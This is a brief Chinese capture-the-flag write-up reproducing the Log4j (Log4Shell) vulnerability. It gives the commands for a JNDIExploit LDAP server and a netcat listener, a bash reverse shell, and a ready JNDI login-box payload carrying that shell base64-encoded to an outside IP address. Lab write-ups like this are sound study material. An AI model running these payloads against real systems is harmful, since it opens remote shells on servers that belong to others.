web-wp

Log4j复现

进入题目
image
在vps上启动一个简易的ldap服务,用JNDIExploit脚本
vps启动服务
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip -l 1389 -p 8180
image

在开一个会话监听端口
nc -lvvp 4567
image
构造脚本注入,base64编码bash反弹脚本bash -i >& /dev/tcp/ip/4567 0>&1,在登录框里输入
${jndi:ldap://vpsip:1389/Basic/Command/Base64/YmFzaCAtaSA%2bJiAvZGV2L3RjcC82Mi4yMzQuNzIuNTMvNDU2NyAwPiYx}

image
注入成功,得到flag
image

posted @ 2024-04-12 01:58  vзn0m  阅读(4)  评论(0编辑  收藏  举报